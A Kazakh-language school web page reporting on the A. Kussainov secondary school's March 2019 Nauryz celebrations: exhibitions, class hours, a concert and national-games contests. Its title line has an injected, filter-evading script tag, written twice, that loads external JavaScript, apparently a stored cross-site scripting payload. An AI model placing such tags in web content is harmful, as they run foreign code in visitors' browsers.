Қош келдің-Наурыз!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.03.2019

А. Құсайынов атындағы орта мектебінің «Қош келдің-Наурыз» мейрамын өткізгені туралы есебі

2018-2019 оқу жылы

А. Құсайынов атындағы орта мектебінде 11.03.-20.03.19 ж. аралығында «Қош келдің-Наурыз»  атты тақырыпта мектепішілік іс-шаралар жоспары құрылып, өткізілді.

11.03-20.03.19 ж. аралығында 1-10 сыныптар арасында мектеп кітапханашысының  ұйымдастыруымен «Кітаптарымның  от шашуы» атты тақырыпта кітап көрмесі өткізілді.

18.03.19 ж күні барлық сыныптарда сынып жетекшілері «Наурыз –қазақ халқының ұлы мейрамы» атты тақырыпта сынып сағаттарын өткізді.

19.03.19 ж күні мектеп ішіндегі шағын орталық пен мектепалды даярлық тобының тәрбиешісі  Аскарова А.А. «Наурыз-достық және гүлдер мерекесі»  атты тақырыпта Ертеңгілік  ұйымдастырды.  Ертеңгілікті шағын орталықтың ата-аналары келіп тамашалады.                                                                                                                                                                                                                                                                                                                                                                                                                          

20.03.19 ж күні тәрбие ісінің меңгерушісі мен 10-сынып жетекшісі Г.Р. Досмагамбетованың басшылығымен  «Қош келдің-Наурыз» атты мерекелік концерттік бағдарлама қойылды. Концерттік бағдарламаға барлық сынып оқушылары белсенді қатысты.

13.03.19 ж.-20.03.19 ж. күндер аралығында  дене шынықтыру мұғалімі Болатхан А. ұйымдастыруымен «Қазақтың ұлттық ойындары»  атты тақырыпта 1-10 сыныптар арасында қазақша күрес, тоғызқұмалақ, көкпар ойындарынан сайыс өткізілді. Жеңімпаздар анықталып, мектеп әкімшілігінің мақтау қағаздарымен марапатталды.

Орындаған: ТЖО  Бейсенбай  А. 24877

Просмотров: 464


Пікір қосу



Деректерді қолтаңбаға қосу